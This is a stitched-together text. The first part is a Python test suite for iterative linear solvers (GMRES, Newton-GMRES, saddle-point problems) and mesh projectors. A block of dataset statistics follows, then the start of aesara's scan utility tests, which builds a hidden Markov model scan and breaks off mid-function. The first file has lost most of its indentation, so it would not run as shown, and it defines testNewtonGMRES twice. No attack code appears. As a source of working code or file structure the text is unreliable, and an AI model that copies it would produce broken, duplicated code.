return dot(A,x)
def P_Rp(x):
out=zeros(size(x), float64)
for i in range(size(x)):
out[i]=x[i]/A[i,i]
return out
tol=1.e-4
x=GMRES(b,Ap,x_ref*0,dot,atol=0, rtol=tol, iter_max=12,P_R=P_Rp)
self.assertLess(Lsup(x-x_ref), Lsup(x_ref)*tol*10.)
def testNewtonGMRES(self):
from numpy import array, dot, zeros, size, float64
from math import sqrt
class LL(Defect):
def __init__(self,*kwargs):
super(LL, self).__init__(*kwargs)
self.A=array([[ 4.752141253159452e+02, -2.391895572674098e-01,
5.834798554135237e-01, -3.704394311709722e+00,
5.765369186984777e+00, -1.309786358737351e+01,
2.522087134507148e+01, -3.393956279045637e+01,
1.046856914770830e+02, -2.447764190849540e+02],
[ -2.391895572674098e-01, 1.256797283910693e+02,
-9.188270412920813e-01, 1.300169538880688e+00,
-5.353714719231424e-01, 2.674709444667012e+00,
-1.116097841269580e+01, 2.801193427514478e+01,
-3.877806125898224e+01, 3.063505753648256e+01],
[ 5.834798554135237e-01, -9.188270412920813e-01,
6.240841811806843e+01, -8.176289504109282e-01,
1.447935098417076e-01, -9.721424148655324e-01,
6.713551574117577e-01, -3.656297654168375e+00,
7.015141656913973e+00, -4.195525932156250e+01],
[ -3.704394311709722e+00, 1.300169538880688e+00,
-8.176289504109282e-01, 3.604980536782198e+01,
-6.241238423759328e-01, 1.142345320047869e+00,
-3.438816797096519e+00, 5.854857481367470e+00,
-4.524311288596452e+00, 1.136590280389803e+01],
[ 5.765369186984777e+00, -5.353714719231424e-01,
1.447935098417076e-01, -6.241238423759328e-01,
2.953997190215862e+01, -9.474729233464712e-01,
1.883516378345809e+00, -1.906274765704230e+00,
4.401859671778645e+00, -1.064573816075257e+01],
[ -1.309786358737351e+01, 2.674709444667012e+00,
-9.721424148655324e-01, 1.142345320047869e+00,
-9.474729233464712e-01, 2.876998216302979e+01,
-4.853065259692995e-01, 7.088596468102618e-01,
-8.972224295152829e-01, 5.228606946522749e+00],
[ 2.522087134507148e+01, -1.116097841269580e+01,
6.713551574117577e-01, -3.438816797096519e+00,
1.883516378345809e+00, -4.853065259692995e-01,
5.121175860935919e+01, -3.523133115905478e-01,
1.782136702229135e+00, -1.560849559916187e+00],
[ -3.393956279045637e+01, 2.801193427514478e+01,
-3.656297654168375e+00, 5.854857481367470e+00,
-1.906274765704230e+00, 7.088596468102618e-01,
-3.523133115905478e-01, 8.411681423853814e+01,
-5.238590858177903e-01, 1.515872114883926e+00],
[ 1.046856914770830e+02, -3.877806125898224e+01,
7.015141656913973e+00, -4.524311288596452e+00,
4.401859671778645e+00, -8.972224295152829e-01,
1.782136702229135e+00, -5.238590858177903e-01,
1.797889693808014e+02, -8.362340479938084e-01],
[ -2.447764190849540e+02, 3.063505753648256e+01,
-4.195525932156250e+01, 1.136590280389803e+01,
-1.064573816075257e+01, 5.228606946522749e+00,
-1.560849559916187e+00, 1.515872114883926e+00,
-8.362340479938084e-01, 3.833719335346630e+02]])
self.x_ref=array([ 0.41794207085296, 0.031441086046563, 0.882801683420401,
0.807186823427233, 0.48950999450145, 0.995486532098031,
0.351243009576568, 0.704352576819321, 0.850648989740204,
0.314596738052894])
self.b=array([ 182.911023960262952, -1.048322041992754, 44.181293875206201,
30.344553414038817, 15.247917439094513, 24.060664905403492,
27.210293789825833, 47.122067744075842, 199.267136417856847,
-8.7934289814322 ])
def eval(self,x):
out=dot(self.A,x)-self.b
for i in range(size(self.b)):
out[i]/=self.A[i,i]
return out
def bilinearform(self,x0,x1):
return dot(x0,x1)
tol=1.e-8
ll=LL()
x=NewtonGMRES(LL(),ll.x_ref*0., iter_max=100, sub_iter_max=20, atol=0,rtol=tol, verbose=self.VERBOSE)
self.assertLess(Lsup(x-ll.x_ref), Lsup(ll.x_ref)*tol*10.)
def testNewtonGMRES(self):
from numpy import array, dot, zeros, size, float64
from math import sqrt
class LL(Defect):
def __init__(self,*kwargs):
super(LL, self).__init__(*kwargs)
self.A=array([[ 4.752141253159452e+02, -2.391895572674098e-01,
5.834798554135237e-01, -3.704394311709722e+00,
5.765369186984777e+00, -1.309786358737351e+01,
2.522087134507148e+01, -3.393956279045637e+01,
1.046856914770830e+02, -2.447764190849540e+02],
[ -2.391895572674098e-01, 1.256797283910693e+02,
-9.188270412920813e-01, 1.300169538880688e+00,
-5.353714719231424e-01, 2.674709444667012e+00,
-1.116097841269580e+01, 2.801193427514478e+01,
-3.877806125898224e+01, 3.063505753648256e+01],
[ 5.834798554135237e-01, -9.188270412920813e-01,
6.240841811806843e+01, -8.176289504109282e-01,
1.447935098417076e-01, -9.721424148655324e-01,
6.713551574117577e-01, -3.656297654168375e+00,
7.015141656913973e+00, -4.195525932156250e+01],
[ -3.704394311709722e+00, 1.300169538880688e+00,
-8.176289504109282e-01, 3.604980536782198e+01,
-6.241238423759328e-01, 1.142345320047869e+00,
-3.438816797096519e+00, 5.854857481367470e+00,
-4.524311288596452e+00, 1.136590280389803e+01],
[ 5.765369186984777e+00, -5.353714719231424e-01,
1.447935098417076e-01, -6.241238423759328e-01,
2.953997190215862e+01, -9.474729233464712e-01,
1.883516378345809e+00, -1.906274765704230e+00,
4.401859671778645e+00, -1.064573816075257e+01],
[ -1.309786358737351e+01, 2.674709444667012e+00,
-9.721424148655324e-01, 1.142345320047869e+00,
-9.474729233464712e-01, 2.876998216302979e+01,
-4.853065259692995e-01, 7.088596468102618e-01,
-8.972224295152829e-01, 5.228606946522749e+00],
[ 2.522087134507148e+01, -1.116097841269580e+01,
6.713551574117577e-01, -3.438816797096519e+00,
1.883516378345809e+00, -4.853065259692995e-01,
5.121175860935919e+01, -3.523133115905478e-01,
1.782136702229135e+00, -1.560849559916187e+00],
[ -3.393956279045637e+01, 2.801193427514478e+01,
-3.656297654168375e+00, 5.854857481367470e+00,
-1.906274765704230e+00, 7.088596468102618e-01,
-3.523133115905478e-01, 8.411681423853814e+01,
-5.238590858177903e-01, 1.515872114883926e+00],
[ 1.046856914770830e+02, -3.877806125898224e+01,
7.015141656913973e+00, -4.524311288596452e+00,
4.401859671778645e+00, -8.972224295152829e-01,
1.782136702229135e+00, -5.238590858177903e-01,
1.797889693808014e+02, -8.362340479938084e-01],
[ -2.447764190849540e+02, 3.063505753648256e+01,
-4.195525932156250e+01, 1.136590280389803e+01,
-1.064573816075257e+01, 5.228606946522749e+00,
-1.560849559916187e+00, 1.515872114883926e+00,
-8.362340479938084e-01, 3.833719335346630e+02]])
self.x_ref=array([ 0.41794207085296, 0.031441086046563, 0.882801683420401,
0.807186823427233, 0.48950999450145, 0.995486532098031,
0.351243009576568, 0.704352576819321, 0.850648989740204,
0.314596738052894])
self.b=array([ 182.911023960262952, -1.048322041992754, 44.181293875206201,
30.344553414038817, 15.247917439094513, 24.060664905403492,
27.210293789825833, 47.122067744075842, 199.267136417856847,
-8.7934289814322 ])
def eval(self,x):
out=dot(self.A,x)-self.b
for i in range(size(self.b)):
out[i]/=self.A[i,i]
return out
def bilinearform(self,x0,x1):
return dot(x0,x1)
tol=1.e-8
ll=LL()
x=NewtonGMRES(LL(),ll.x_ref*0., iter_max=100, sub_iter_max=20, atol=0,rtol=tol, verbose=self.VERBOSE)
self.assertLess(Lsup(x-ll.x_ref), Lsup(ll.x_ref)*tol*10.)
def testHomogeneousSaddlePointProblem_PCG(self):
from numpy import array, dot, zeros, size, float64
from math import sqrt
class LL(HomogeneousSaddlePointProblem):
def initialize(self):
self.A=array([[ 4.752141253159452e+02, -2.391895572674098e-01,
5.834798554135237e-01, -3.704394311709722e+00,
5.765369186984777e+00, -1.309786358737351e+01,
2.522087134507148e+01, -3.393956279045637e+01,
1.046856914770830e+02, -2.447764190849540e+02],
[ -2.391895572674098e-01, 1.256797283910693e+02,
-9.188270412920813e-01, 1.300169538880688e+00,
-5.353714719231424e-01, 2.674709444667012e+00,
-1.116097841269580e+01, 2.801193427514478e+01,
-3.877806125898224e+01, 3.063505753648256e+01],
[ 5.834798554135237e-01, -9.188270412920813e-01,
6.240841811806843e+01, -8.176289504109282e-01,
1.447935098417076e-01, -9.721424148655324e-01,
6.713551574117577e-01, -3.656297654168375e+00,
7.015141656913973e+00, -4.195525932156250e+01],
[ -3.704394311709722e+00, 1.300169538880688e+00,
-8.176289504109282e-01, 3.604980536782198e+01,
-6.241238423759328e-01, 1.142345320047869e+00,
-3.438816797096519e+00, 5.854857481367470e+00,
-4.524311288596452e+00, 1.136590280389803e+01],
[ 5.765369186984777e+00, -5.353714719231424e-01,
1.447935098417076e-01, -6.241238423759328e-01,
2.953997190215862e+01, -9.474729233464712e-01,
1.883516378345809e+00, -1.906274765704230e+00,
4.401859671778645e+00, -1.064573816075257e+01],
[ -1.309786358737351e+01, 2.674709444667012e+00,
-9.721424148655324e-01, 1.142345320047869e+00,
-9.474729233464712e-01, 2.876998216302979e+01,
-4.853065259692995e-01, 7.088596468102618e-01,
-8.972224295152829e-01, 5.228606946522749e+00],
[ 2.522087134507148e+01, -1.116097841269580e+01,
6.713551574117577e-01, -3.438816797096519e+00,
1.883516378345809e+00, -4.853065259692995e-01,
5.121175860935919e+01, -3.523133115905478e-01,
1.782136702229135e+00, -1.560849559916187e+00],
[ -3.393956279045637e+01, 2.801193427514478e+01,
-3.656297654168375e+00, 5.854857481367470e+00,
-1.906274765704230e+00, 7.088596468102618e-01,
-3.523133115905478e-01, 8.411681423853814e+01,
-5.238590858177903e-01, 1.515872114883926e+00],
[ 1.046856914770830e+02, -3.877806125898224e+01,
7.015141656913973e+00, -4.524311288596452e+00,
4.401859671778645e+00, -8.972224295152829e-01,
1.782136702229135e+00, -5.238590858177903e-01,
1.797889693808014e+02, -8.362340479938084e-01],
[ -2.447764190849540e+02, 3.063505753648256e+01,
-4.195525932156250e+01, 1.136590280389803e+01,
-1.064573816075257e+01, 5.228606946522749e+00,
-1.560849559916187e+00, 1.515872114883926e+00,
-8.362340479938084e-01, 3.833719335346630e+02]])
self.x_ref=array([ 0.100225501676291, -0.308862704993209, 0.064097238997721,
0.253012436539738, -0.346223308561905, 0.2425508275422,
-0.194695862196008, 0.09451439391473, 0.302961126826511,
-0.236043777597633] )
self.Bt=array([[ 0.01627853113636 ,0.06688235764255 , 0.004870689484614],
[ 0.062879587145773 ,0.038798770300146, 0.022155850155616],
[ 0.09312121957248 ,0.110244632756116, 0.14053347386784 ],
[ 0.059000597728388 ,0.090986953740106, 0.035316011834982],
[ 0.091209362659698 ,0.13205572801294 , 0.069462874306956],
[ 0.077790176986096 ,0.133626423045765, 0.011149969846981],
[ 0.01407283482513 ,0.094910926488907, 0.133498532648644],
[ 0.025728916673085 ,0.102542818811672, 0.13657268163218 ],
[ 0.071254288170748 ,0.071738715618163, 0.078005951991733],
[ 0.049463014576779 ,0.103559223780991, 0.003356415647637]])
self.p_ref = array([ 2.580984952252628 ,4.054090902056985, 0.935138168128546])
self.b=array([ 123.322775367582238, -51.556206655564573 , 16.220697868056913,
6.512480714694167 , -5.727371407390975 , 4.802494840775022,
-4.171606044721161 , -1.862366353566293 ,74.850226163257105,
-118.602464657076439])
self.Sinv=array([[ 9313.705360982807179,-5755.536981691270739, 806.289245589733696],
[-5755.536981691271649, 4606.321002756208145,-1630.50619635660928 ],
[ 806.289245589733468,-1630.506196356609053, 2145.65035816388945 ]])
def inner_pBv(self,p,Bv):
return dot(p,Bv)
def Bv(self,v, tol):
return dot(transpose(self.Bt),v)
def inner_p(self,p0,p1):
return dot(p0,p1)
def norm_v(self,v):
return sqrt(dot(v,v))
def getDV(self,p,v, tol):
dv=solve_linear_equations(self.A, self.b-dot(self.Bt,p)-dot(self.A,v))
return dv*(1+tol)
def norm_Bv(self,Bv):
return sqrt(dot(Bv,Bv))
def solve_AinvBt(self,p, tol):
out=solve_linear_equations(self.A, dot(self.Bt,p))
return out*(1.+tol)
def solve_prec(self,Bv, tol):
out=Bv*1.
for i in range(size(out)): out[i]*=self.Sinv[i,i]
return out*(1-tol)
tol=1.e-8
ll=LL()
ll.initialize()
ll.setTolerance(tol)
# ll.setSubToleranceReductionFactor(0.1)
x,p=ll.solve(ll.x_ref*1.20,ll.p_ref*(-2),max_iter=20, verbose=False, usePCG=True, iter_restart=20,max_correction_steps=10)
self.assertLess(Lsup(x-ll.x_ref), Lsup(ll.x_ref)*tol*10.)
self.assertLess(Lsup(p-ll.p_ref), Lsup(ll.p_ref)*tol*10.)
def testHomogeneousSaddlePointProblem_GMRES(self):
from numpy import array, prod, dot, zeros, size, float64
from math import sqrt
class LL(HomogeneousSaddlePointProblem):
def initialize(self):
self.A=array([[ 4.752141253159452e+02, -2.391895572674098e-01,
5.834798554135237e-01, -3.704394311709722e+00,
5.765369186984777e+00, -1.309786358737351e+01,
2.522087134507148e+01, -3.393956279045637e+01,
1.046856914770830e+02, -2.447764190849540e+02],
[ -2.391895572674098e-01, 1.256797283910693e+02,
-9.188270412920813e-01, 1.300169538880688e+00,
-5.353714719231424e-01, 2.674709444667012e+00,
-1.116097841269580e+01, 2.801193427514478e+01,
-3.877806125898224e+01, 3.063505753648256e+01],
[ 5.834798554135237e-01, -9.188270412920813e-01,
6.240841811806843e+01, -8.176289504109282e-01,
1.447935098417076e-01, -9.721424148655324e-01,
6.713551574117577e-01, -3.656297654168375e+00,
7.015141656913973e+00, -4.195525932156250e+01],
[ -3.704394311709722e+00, 1.300169538880688e+00,
-8.176289504109282e-01, 3.604980536782198e+01,
-6.241238423759328e-01, 1.142345320047869e+00,
-3.438816797096519e+00, 5.854857481367470e+00,
-4.524311288596452e+00, 1.136590280389803e+01],
[ 5.765369186984777e+00, -5.353714719231424e-01,
1.447935098417076e-01, -6.241238423759328e-01,
2.953997190215862e+01, -9.474729233464712e-01,
1.883516378345809e+00, -1.906274765704230e+00,
4.401859671778645e+00, -1.064573816075257e+01],
[ -1.309786358737351e+01, 2.674709444667012e+00,
-9.721424148655324e-01, 1.142345320047869e+00,
-9.474729233464712e-01, 2.876998216302979e+01,
-4.853065259692995e-01, 7.088596468102618e-01,
-8.972224295152829e-01, 5.228606946522749e+00],
[ 2.522087134507148e+01, -1.116097841269580e+01,
6.713551574117577e-01, -3.438816797096519e+00,
1.883516378345809e+00, -4.853065259692995e-01,
5.121175860935919e+01, -3.523133115905478e-01,
1.782136702229135e+00, -1.560849559916187e+00],
[ -3.393956279045637e+01, 2.801193427514478e+01,
-3.656297654168375e+00, 5.854857481367470e+00,
-1.906274765704230e+00, 7.088596468102618e-01,
-3.523133115905478e-01, 8.411681423853814e+01,
-5.238590858177903e-01, 1.515872114883926e+00],
[ 1.046856914770830e+02, -3.877806125898224e+01,
7.015141656913973e+00, -4.524311288596452e+00,
4.401859671778645e+00, -8.972224295152829e-01,
1.782136702229135e+00, -5.238590858177903e-01,
1.797889693808014e+02, -8.362340479938084e-01],
[ -2.447764190849540e+02, 3.063505753648256e+01,
-4.195525932156250e+01, 1.136590280389803e+01,
-1.064573816075257e+01, 5.228606946522749e+00,
-1.560849559916187e+00, 1.515872114883926e+00,
-8.362340479938084e-01, 3.833719335346630e+02]])
self.x_ref=array([ 0.100225501676291, -0.308862704993209, 0.064097238997721,
0.253012436539738, -0.346223308561905, 0.2425508275422,
-0.194695862196008, 0.09451439391473, 0.302961126826511,
-0.236043777597633] )
self.Bt=array([[ 0.01627853113636 ,0.06688235764255 , 0.004870689484614],
[ 0.062879587145773 ,0.038798770300146, 0.022155850155616],
[ 0.09312121957248 ,0.110244632756116, 0.14053347386784 ],
[ 0.059000597728388 ,0.090986953740106, 0.035316011834982],
[ 0.091209362659698 ,0.13205572801294 , 0.069462874306956],
[ 0.077790176986096 ,0.133626423045765, 0.011149969846981],
[ 0.01407283482513 ,0.094910926488907, 0.133498532648644],
[ 0.025728916673085 ,0.102542818811672, 0.13657268163218 ],
[ 0.071254288170748 ,0.071738715618163, 0.078005951991733],
[ 0.049463014576779 ,0.103559223780991, 0.003356415647637]])
self.p_ref = array([ 2.580984952252628 ,4.054090902056985, 0.935138168128546])
self.b=array([ 123.322775367582238, -51.556206655564573 , 16.220697868056913,
6.512480714694167 , -5.727371407390975 , 4.802494840775022,
-4.171606044721161 , -1.862366353566293 ,74.850226163257105,
-118.602464657076439])
self.Sinv=array([[ 9313.705360982807179,-5755.536981691270739, 806.289245589733696],
[-5755.536981691271649, 4606.321002756208145,-1630.50619635660928 ],
[ 806.289245589733468,-1630.506196356609053, 2145.65035816388945 ]])
def inner_pBv(self,p,Bv):
return dot(p,Bv)
def Bv(self,v, tol):
return dot(transpose(self.Bt),v)
def inner_p(self,p0,p1):
return dot(p0,p1)
def norm_v(self,v):
return sqrt(dot(v,v))
def getDV(self,p,v, tol):
dv=solve_linear_equations(self.A, self.b-dot(self.Bt,p)-dot(self.A,v))
return dv*(1+tol)
def norm_Bv(self,Bv):
return sqrt(dot(Bv,Bv))
def solve_AinvBt(self,p, tol):
out=solve_linear_equations(self.A, dot(self.Bt,p))
return out*(1.+tol)
def solve_prec(self,Bv, tol):
out=Bv*1.
for i in range(size(out)): out[i]*=self.Sinv[i,i]
return out*(1-tol)
tol=1.e-8
ll=LL()
ll.initialize()
ll.setTolerance(tol)
# ll.setSubToleranceReductionFactor(0.1)
x,p=ll.solve(ll.x_ref*1.20,ll.p_ref*(-2),max_iter=20, verbose=False, usePCG=False,
iter_restart=20,max_correction_steps=10)
self.assertLess(Lsup(x-ll.x_ref), Lsup(ll.x_ref)*tol*10.)
self.assertLess(Lsup(p-ll.p_ref), Lsup(ll.p_ref)*tol*10.)
def testArithmeticTuple(self):
a=ArithmeticTuple(1.,2.)
self.assertTrue(len(a)==2, "wrong length")
self.assertTrue(a[0]==1., "wrong first item")
self.assertTrue(a[1]==2., "wrong second item")
c=a*6.
self.assertTrue(isinstance(c,ArithmeticTuple), "c is not an instance of ArithmeticTuple")
self.assertTrue(len(c)==2, "c has wrong length")
self.assertTrue(c[0]==6., "c has wrong first item")
self.assertTrue(c[1]==12., "c has wrong second item")
b=5.*a
self.assertTrue(isinstance(b,ArithmeticTuple),"b is not an instance of ArithmeticTuple")
self.assertTrue(len(b)==2, "b has wrong length")
self.assertTrue(b[0]==5., "b has wrong first item")
self.assertTrue(b[1]==10., "b has wrong second item")
a+=ArithmeticTuple(3.,4.)
self.assertTrue(a[0]==4., "wrong first item of inplace update")
self.assertTrue(a[1]==6., "wrong second item of inplace update")
class Test_pdetools(Test_pdetools_noLumping):
   """Repeats the pdetools tests and adds projection tests using a fast
   (fast=True), reduced-order (reduce=True) Projector for data of rank 0-4,
   with both Function-space and ReducedFunction-space input."""
   def _makeFastReducedProjector(self):
      # fast, reduced-order projector plus the mesh-size based tolerance h
      return Projector(self.domain, reduce=True, fast=True), Lsup(self.domain.getSize())
   def _assertProjectsTo(self, proj, h, td_ref, arg):
      # project arg and require the result to match td_ref within tolerance h
      td=proj(arg)
      self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*h)
   def testProjector_rank0_fast_reduced(self):
      proj,h=self._makeFastReducedProjector()
      td_ref=ContinuousFunction(self.domain).getX()[0]
      self._assertProjectsTo(proj, h, td_ref, td_ref.interpolate(Function(self.domain)))
   def testProjector_rank1_fast_reduced(self):
      proj,h=self._makeFastReducedProjector()
      td_ref=ContinuousFunction(self.domain).getX()
      self._assertProjectsTo(proj, h, td_ref, td_ref.interpolate(Function(self.domain)))
   def testProjector_rank2_fast_reduced(self):
      proj,h=self._makeFastReducedProjector()
      x=ContinuousFunction(self.domain).getX()
      td_ref=[[11.,12.],[21,22.]]*(x[0]+x[1])
      self._assertProjectsTo(proj, h, td_ref, td_ref.interpolate(Function(self.domain)))
   def testProjector_rank3_fast_reduced(self):
      proj,h=self._makeFastReducedProjector()
      x=ContinuousFunction(self.domain).getX()
      td_ref=[[[111.,112.],[121,122.]],[[211.,212.],[221,222.]]]*(x[0]+x[1])
      self._assertProjectsTo(proj, h, td_ref, td_ref.interpolate(Function(self.domain)))
   def testProjector_rank4_fast_reduced(self):
      proj,h=self._makeFastReducedProjector()
      x=ContinuousFunction(self.domain).getX()
      td_ref=[[[[1111.,1112.],[1121,1122.]],[[1211.,1212.],[1221,1222.]]],
              [[[2111.,2112.],[2121,2122.]],[[2211.,2212.],[2221,2222.]]]]*(x[0]+x[1])
      self._assertProjectsTo(proj, h, td_ref, td_ref.interpolate(Function(self.domain)))
   def testProjector_rank0_fast_reduced_with_reduced_input(self):
      proj,h=self._makeFastReducedProjector()
      td_ref=1.
      self._assertProjectsTo(proj, h, td_ref, Data(td_ref, ReducedFunction(self.domain)))
   def testProjector_rank1_fast_reduced_with_reduced_input(self):
      proj,h=self._makeFastReducedProjector()
      td_ref=numpy.array([1.,2.,3.])
      self._assertProjectsTo(proj, h, td_ref, Data(td_ref, ReducedFunction(self.domain)))
   def testProjector_rank2_fast_reduced_with_reduced_input(self):
      proj,h=self._makeFastReducedProjector()
      td_ref=numpy.array([[11.,12.],[21,22.]])
      self._assertProjectsTo(proj, h, td_ref, Data(td_ref, ReducedFunction(self.domain)))
   def testProjector_rank3_fast_reduced_with_reduced_input(self):
      proj,h=self._makeFastReducedProjector()
      td_ref=numpy.array([[[111.,112.],[121,122.]],[[211.,212.],[221,222.]]])
      self._assertProjectsTo(proj, h, td_ref, Data(td_ref, ReducedFunction(self.domain)))
   def testProjector_rank4_fast_reduced_with_reduced_input(self):
      proj,h=self._makeFastReducedProjector()
      td_ref=numpy.array([[[[1111.,1112.],[1121,1122.]],[[1211.,1212.],[1221,1222.]]],
                          [[[2111.,2112.],[2121,2122.]],[[2211.,2212.],[2221,2222.]]]])
      self._assertProjectsTo(proj, h, td_ref, Data(td_ref, ReducedFunction(self.domain)))
| 54.243506
| 154
| 0.581927
| 7,396
| 66,828
| 5.19132
| 0.06463
| 0.038026
| 0.024378
| 0.021097
| 0.947519
| 0.936398
| 0.932439
| 0.931215
| 0.926527
| 0.922047
| 0
| 0.450763
| 0.286871
| 66,828
| 1,231
| 155
| 54.287571
| 0.35489
| 0.008933
| 0
| 0.868733
| 0
| 0
| 0.019524
| 0
| 0
| 0
| 0
| 0
| 0.090246
| 1
| 0.076572
| false
| 0
| 0.022789
| 0.013674
| 0.132179
| 0.000912
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4fe5eec57880f00e878a2549b7b487f2c57c7922
| 18,665
|
py
|
Python
|
tests/scan/test_utils.py
|
zaxtax/aesara
|
ef256e526e313f9e7916f8c9b2c4802c44d0b44a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/scan/test_utils.py
|
zaxtax/aesara
|
ef256e526e313f9e7916f8c9b2c4802c44d0b44a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/scan/test_utils.py
|
zaxtax/aesara
|
ef256e526e313f9e7916f8c9b2c4802c44d0b44a
|
[
"BSD-3-Clause"
] | null | null | null |
from copy import copy
import numpy as np
import pytest
import aesara
from aesara import tensor as at
from aesara.scan.utils import ScanArgs
@pytest.fixture(scope="module", autouse=True)
def set_aesara_flags():
    # Run every test in this module without a C compiler (cxx="") and in
    # FAST_COMPILE mode to keep graph compilation cheap; the context manager
    # restores the previous flags when the module's tests finish.
    with aesara.config.change_flags(cxx="", mode="FAST_COMPILE"):
        yield
def create_test_hmm():
    """Build a small HMM `Scan` graph and return *all* of this function's locals.

    Constructs a 2-state hidden Markov model (Dirichlet-distributed initial
    state and transition matrix, categorical states, normal emissions) whose
    state/emission sequences come from `aesara.scan`, then pulls the resulting
    `Scan` node apart with `ScanArgs`.  The whole local namespace is returned
    as a dict so each test can pick out whichever graph pieces it needs.
    """
    rng_state = np.random.default_rng(23422)
    rng_tt = aesara.shared(rng_state, name="rng", borrow=True)
    rng_tt.tag.is_rng = True
    # The RNG updates itself each scan step.
    rng_tt.default_update = rng_tt
    N_tt = at.iscalar("N")
    N_tt.tag.test_value = 10
    M_tt = at.iscalar("M")
    M_tt.tag.test_value = 2
    mus_tt = at.matrix("mus")
    mus_tt.tag.test_value = np.stack(
        [np.arange(0.0, 10), np.arange(0.0, -10, -1)], axis=-1
    ).astype(aesara.config.floatX)
    sigmas_tt = at.ones((N_tt,))
    sigmas_tt.name = "sigmas"
    pi_0_rv = at.random.dirichlet(at.ones((M_tt,)), rng=rng_tt, name="pi_0")
    Gamma_rv = at.random.dirichlet(at.ones((M_tt, M_tt)), rng=rng_tt, name="Gamma")
    S_0_rv = at.random.categorical(pi_0_rv, rng=rng_tt, name="S_0")

    def scan_fn(mus_t, sigma_t, S_tm1, Gamma_t, rng):
        # One HMM step: sample the next state from its transition row, then
        # the emission from that state's mean/scale.
        S_t = at.random.categorical(Gamma_t[S_tm1], rng=rng, name="S_t")
        Y_t = at.random.normal(mus_t[S_t], sigma_t, rng=rng, name="Y_t")
        return S_t, Y_t

    (S_rv, Y_rv), scan_updates = aesara.scan(
        fn=scan_fn,
        sequences=[mus_tt, sigmas_tt],
        non_sequences=[Gamma_rv, rng_tt],
        outputs_info=[{"initial": S_0_rv, "taps": [-1]}, {}],
        strict=True,
        name="scan_rv",
    )
    Y_rv.name = "Y_rv"
    scan_op = Y_rv.owner.op
    scan_args = ScanArgs.from_node(Y_rv.owner)
    # Handles to the inner-graph (per-step) and outer-graph variables, used
    # by the tests below to probe `ScanArgs`'s bookkeeping.
    Gamma_in = scan_args.inner_in_non_seqs[0]
    Y_t = scan_args.inner_out_nit_sot[0]
    mus_t = scan_args.inner_in_seqs[0]
    sigmas_t = scan_args.inner_in_seqs[1]
    S_t = scan_args.inner_out_sit_sot[0]
    rng_in = scan_args.inner_out_shared[0]
    rng_updates = scan_updates[rng_tt]
    rng_updates.name = "rng_updates"
    mus_in = Y_rv.owner.inputs[1]
    mus_in.name = "mus_in"
    sigmas_in = Y_rv.owner.inputs[2]
    sigmas_in.name = "sigmas_in"
    # The output `S_rv` is really `S_rv[1:]`, so we have to extract the actual
    # `Scan` output: `S_rv`.
    S_in = S_rv.owner.inputs[0]
    S_in.name = "S_in"
    return locals()
def test_ScanArgs():
    """Basic `ScanArgs` behavior: construction, field lookup, copy/equality."""
    # Make sure we can create an empty `ScanArgs`
    scan_args = ScanArgs.create_empty()
    assert scan_args.n_steps is None
    for name in scan_args.field_names:
        if name == "n_steps":
            continue
        assert len(getattr(scan_args, name)) == 0
    # A non-`Scan` node must be rejected.
    with pytest.raises(TypeError):
        ScanArgs.from_node(at.ones(2).owner)
    hmm_model_env = create_test_hmm()
    scan_args = hmm_model_env["scan_args"]
    scan_op = hmm_model_env["scan_op"]
    # Make sure we can get alternate variables
    test_v = scan_args.outer_out_sit_sot[0]
    alt_test_v = scan_args.get_alt_field(test_v, "inner_out")
    assert alt_test_v == scan_args.inner_out_sit_sot[0]
    alt_test_v = scan_args.get_alt_field(test_v, "outer_in")
    assert alt_test_v == scan_args.outer_in_sit_sot[0]
    # Check the `__repr__` and `__str__`
    scan_args_repr = repr(scan_args)
    # Just make sure it doesn't err-out
    assert scan_args_repr.startswith("ScanArgs")
    # Check the properties that allow us to use
    # `Scan.get_oinp_iinp_iout_oout_mappings` as-is to implement
    # `ScanArgs.var_mappings`
    assert scan_args.n_nit_sot == scan_op.n_nit_sot
    assert scan_args.n_mit_mot == scan_op.n_mit_mot
    # The `scan_args` base class always clones the inner-graph;
    # here we make sure it doesn't (and that all the inputs are the same)
    assert scan_args.inputs == scan_op.inputs
    assert scan_args.info == scan_op.info
    # Check that `ScanArgs.find_among_fields` works
    test_v = scan_op.inner_seqs(scan_op.inputs)[1]
    field_info = scan_args.find_among_fields(test_v)
    assert field_info.name == "inner_in_seqs"
    assert field_info.index == 1
    assert field_info.inner_index is None
    assert scan_args.inner_inputs[field_info.agg_index] == test_v
    test_l = scan_op.inner_non_seqs(scan_op.inputs)
    # We didn't index this argument, so it's a `list` (i.e. bad input)
    field_info = scan_args.find_among_fields(test_l)
    assert field_info is None
    test_v = test_l[0]
    field_info = scan_args.find_among_fields(test_v)
    assert field_info.name == "inner_in_non_seqs"
    assert field_info.index == 0
    assert field_info.inner_index is None
    assert scan_args.inner_inputs[field_info.agg_index] == test_v
    # `copy` must produce an equal-but-distinct object; mutating the copy
    # must break equality with the original.
    scan_args_copy = copy(scan_args)
    assert scan_args_copy is not scan_args
    assert scan_args_copy == scan_args
    assert scan_args_copy != test_v
    scan_args_copy.outer_in_seqs.pop()
    assert scan_args_copy != scan_args
def test_ScanArgs_basics_mit_sot():
    """`ScanArgs` field lookup/removal on a scan with a mit-sot (two-tap) output."""
    rng_state = np.random.RandomState(np.random.MT19937(np.random.SeedSequence(1234)))
    rng_tt = aesara.shared(rng_state, name="rng", borrow=True)
    rng_tt.tag.is_rng = True
    rng_tt.default_update = rng_tt
    N_tt = at.iscalar("N")
    N_tt.tag.test_value = 10
    M_tt = at.iscalar("M")
    M_tt.tag.test_value = 2
    mus_tt = at.matrix("mus")
    mus_tt.tag.test_value = np.stack(
        [np.arange(0.0, 10), np.arange(0.0, -10, -1)], axis=-1
    ).astype(aesara.config.floatX)
    sigmas_tt = at.ones((N_tt,))
    sigmas_tt.name = "sigmas"
    pi_0_rv = at.random.dirichlet(at.ones((M_tt,)), rng=rng_tt, name="pi_0")
    Gamma_rv = at.random.dirichlet(at.ones((M_tt, M_tt)), rng=rng_tt, name="Gamma")
    S_0_rv = at.random.categorical(pi_0_rv, rng=rng_tt, name="S_0")

    def scan_fn(mus_t, sigma_t, S_tm2, S_tm1, Gamma_t, rng):
        # Uses taps [-2, -1], which makes the state output a mit-sot.
        S_t = at.random.categorical(Gamma_t[S_tm2], rng=rng, name="S_t")
